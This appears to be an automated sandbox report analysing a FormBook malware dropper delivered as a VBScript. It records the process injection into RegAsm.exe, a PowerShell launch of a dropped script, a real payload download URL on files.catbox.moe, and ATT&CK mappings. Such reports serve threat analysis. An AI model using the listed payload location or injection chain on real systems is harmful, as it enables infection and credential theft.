            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E897A9 mov eax, dword ptr fs:[00000030h]7_2_02E897A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8F7AF mov eax, dword ptr fs:[00000030h]7_2_02E8F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8F7AF mov eax, dword ptr fs:[00000030h]7_2_02E8F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8F7AF mov eax, dword ptr fs:[00000030h]7_2_02E8F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8F7AF mov eax, dword ptr fs:[00000030h]7_2_02E8F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8F7AF mov eax, dword ptr fs:[00000030h]7_2_02E8F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E007AF mov eax, dword ptr fs:[00000030h]7_2_02E007AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2D7B0 mov eax, dword ptr fs:[00000030h]7_2_02E2D7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED37B6 mov eax, dword ptr fs:[00000030h]7_2_02ED37B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBF78A mov eax, dword ptr fs:[00000030h]7_2_02EBF78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF7BA mov eax, dword ptr fs:[00000030h]7_2_02DFF7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E08770 mov eax, dword ptr fs:[00000030h]7_2_02E08770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10770 mov eax, dword ptr fs:[00000030h]7_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E13740 mov eax, dword ptr fs:[00000030h]7_2_02E13740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E13740 mov eax, dword ptr fs:[00000030h]7_2_02E13740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E13740 mov eax, dword ptr fs:[00000030h]7_2_02E13740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED3749 mov eax, dword ptr fs:[00000030h]7_2_02ED3749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3674D mov esi, dword ptr fs:[00000030h]7_2_02E3674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3674D mov eax, dword ptr fs:[00000030h]7_2_02E3674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3674D mov eax, dword ptr fs:[00000030h]7_2_02E3674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E00750 mov eax, dword ptr fs:[00000030h]7_2_02E00750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42750 mov eax, dword ptr fs:[00000030h]7_2_02E42750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42750 mov eax, dword ptr fs:[00000030h]7_2_02E42750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB765 mov eax, dword ptr fs:[00000030h]7_2_02DFB765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB765 mov eax, dword ptr fs:[00000030h]7_2_02DFB765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB765 mov eax, dword ptr fs:[00000030h]7_2_02DFB765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB765 mov eax, dword ptr fs:[00000030h]7_2_02DFB765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E84755 mov eax, dword ptr fs:[00000030h]7_2_02E84755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E03720 mov eax, dword ptr fs:[00000030h]7_2_02E03720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1F720 mov eax, dword ptr fs:[00000030h]7_2_02E1F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1F720 mov eax, dword ptr fs:[00000030h]7_2_02E1F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1F720 mov eax, dword ptr fs:[00000030h]7_2_02E1F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3C720 mov eax, dword ptr fs:[00000030h]7_2_02E3C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3C720 mov eax, dword ptr fs:[00000030h]7_2_02E3C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBF72E mov eax, dword ptr fs:[00000030h]7_2_02EBF72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC972B mov eax, dword ptr fs:[00000030h]7_2_02EC972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDB73C mov eax, dword ptr fs:[00000030h]7_2_02EDB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDB73C mov eax, dword ptr fs:[00000030h]7_2_02EDB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDB73C mov eax, dword ptr fs:[00000030h]7_2_02EDB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDB73C mov eax, dword ptr fs:[00000030h]7_2_02EDB73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E7C730 mov eax, dword ptr fs:[00000030h]7_2_02E7C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E35734 mov eax, dword ptr fs:[00000030h]7_2_02E35734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0973A mov eax, dword ptr fs:[00000030h]7_2_02E0973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0973A mov eax, dword ptr fs:[00000030h]7_2_02E0973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3273C mov eax, dword ptr fs:[00000030h]7_2_02E3273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3273C mov ecx, dword ptr fs:[00000030h]7_2_02E3273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3273C mov eax, dword ptr fs:[00000030h]7_2_02E3273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E05702 mov eax, dword ptr fs:[00000030h]7_2_02E05702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E05702 mov eax, dword ptr fs:[00000030h]7_2_02E05702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E07703 mov eax, dword ptr fs:[00000030h]7_2_02E07703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3C700 mov eax, dword ptr fs:[00000030h]7_2_02E3C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9730 mov eax, dword ptr fs:[00000030h]7_2_02DF9730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9730 mov eax, dword ptr fs:[00000030h]7_2_02DF9730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E00710 mov eax, dword ptr fs:[00000030h]7_2_02E00710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E30710 mov eax, dword ptr fs:[00000030h]7_2_02E30710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3F71F mov eax, dword ptr fs:[00000030h]7_2_02E3F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3F71F mov eax, dword ptr fs:[00000030h]7_2_02E3F71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E004E5 mov ecx, dword ptr fs:[00000030h]7_2_02E004E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EA94E0 mov eax, dword ptr fs:[00000030h]7_2_02EA94E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
            .NET source code references suspicious native API functions
            Source: x.exe.4.dr, Program.csReference to suspicious API methods: BaseApp.ReadProcessMemory(processHandle, address, ref baseAddress, 4, ref bytesRead)
            Source: x.exe.4.dr, Program.csReference to suspicious API methods: BaseApp.VirtualAllocEx(processHandle, imageBase, size, 12288, 64)
            Source: x.exe.4.dr, Program.csReference to suspicious API methods: BaseApp.WriteProcessMemory(Config.processInfo.ProcessHandle, newImageBase, executablePayload, size, ref bytesWritten)
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A30008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Native API            		221
            Scripting            		411
            Process Injection            		1
            Masquerading            		OS Credential Dumping21
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		Logon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577448 Sample: z68scancopy.vbs Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 29 files.catbox.moe 2->29 41 Suricata IDS alerts for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 7 other signatures 2->47 9 wscript.exe 16 2->9         started        signatures3 process4 dnsIp5 31 files.catbox.moe 108.181.20.35, 443, 49701 ASN852CA Canada 9->31 25 C:\Temp\dddddd.ps1, ASCII 9->25 dropped 49 System process connects to network (likely due to code injection or exploit) 9->49 51 VBScript performs obfuscated calls to suspicious functions 9->51 53 Wscript starts Powershell (via cmd or directly) 9->53 55 2 other signatures 9->55 14 powershell.exe 13 9->14         started        file6 signatures7 process8 file9 27 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->27 dropped 57 Suspicious execution chain found 14->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 14->59 61 Powershell drops PE file 14->61 18 x.exe 3 14->18         started        21 conhost.exe 14->21         started        signatures10 process11 signatures12 33 Antivirus detection for dropped file 18->33 35 Machine Learning detection for dropped file 18->35 37 Writes to foreign memory regions 18->37 39 2 other signatures 18->39 23 RegAsm.exe 18->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z68scancopy.vbs21%ReversingLabsScript-WScript.Backdoor.FormBook

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://files.catbox.moe;0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            files.catbox.moe
            		108.181.20.35
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://files.catbox.moe/q8ynky.ps1false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://files.catbox.moe;wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://files.catbox.moe/~wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://files.catbox.moe/q8ynky.ps1=wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://oneget.orgXpowershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://files.catbox.moe/wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore68powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://files.catbox.moewscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://files.catbox.moe/q8ynky.ps13wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://oneget.orgpowershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://files.catbox.moe/q8ynky.ps1kwscript.exe, 00000000.00000003.1452801377.0000023357B27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453767715.0000023357B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      108.181.20.35
                                                      		files.catbox.moeCanada
                                                      		852ASN852CAfalse

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1577448
                                                      Start date and time:2024-12-18 13:36:39 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 29s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:z68scancopy.vbs
                                                      Detection:MAL
                                                      Classification:mal100.spre.troj.expl.evad.winVBS@8/7@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 24
                                                      • Number of non-executed functions: 316
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
